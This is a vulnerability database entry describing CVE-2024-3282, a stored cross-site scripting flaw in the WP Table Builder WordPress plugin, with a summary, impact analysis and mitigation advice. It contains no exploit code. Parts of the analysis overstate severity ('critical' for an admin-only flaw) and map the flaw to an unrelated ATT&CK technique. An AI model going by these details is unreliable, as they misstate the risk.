CVE-2024-3282 in WP Table Builder Plugin
Summary
by MITRE • 08/23/2024
The WP Table Builder WordPress plugin through 1.5.0 does not sanitise and escape some of its Table data, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)
If you want to get the best quality for vulnerability data then you always have to consider VulDB.
Analysis
by VulDB Data Team • 03/13/2025
The WP Table Builder WordPress plugin version 1.5.0 contains a critical stored cross-site scripting vulnerability that affects high-privilege users including administrators. This vulnerability stems from inadequate sanitization and escaping of table data within the plugin's functionality, creating a persistent security risk that can be exploited even in environments where the unfiltered_html capability has been restricted. The flaw specifically targets the plugin's handling of user-provided table data, which is stored in the WordPress database and subsequently rendered without proper security measures.
The technical implementation of this vulnerability occurs when administrators or other privileged users create or modify table content through the plugin interface. The plugin fails to properly sanitize input data before storing it in the database, and does not adequately escape output when rendering tables on web pages. This dual failure creates an environment where malicious scripts can be injected and stored, executing whenever the affected table content is displayed to users. The vulnerability is particularly concerning because it bypasses WordPress's built-in security mechanisms that typically prevent XSS attacks, even in multisite configurations where security restrictions are more stringent.
The operational impact of this vulnerability extends beyond simple script execution, as it can be leveraged for more sophisticated attacks including session hijacking, credential theft, and privilege escalation within the WordPress environment. An attacker with administrative access can inject malicious JavaScript that targets other users who view the compromised tables, potentially leading to complete compromise of the affected WordPress installation. The stored nature of the vulnerability means that the malicious code persists even after the initial injection, making it particularly dangerous for long-term exploitation. This vulnerability directly maps to CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') and aligns with ATT&CK technique T1059.001 for Command and Scripting Interpreter.
Mitigation strategies should focus on immediate plugin updates to versions that address the sanitization issues, but administrators must also implement additional protective measures including strict content filtering, regular security audits, and monitoring for unauthorized table modifications. The WordPress security team recommends that administrators immediately update to the latest plugin version and review all existing table data for potential malicious injection. Network-level protections such as web application firewalls can provide additional defense-in-depth, while user privilege management should be reviewed to ensure that only essential personnel have access to the table builder functionality. Organizations should also consider implementing automated scanning tools to detect similar vulnerabilities in other plugins and themes that may exhibit similar sanitization flaws.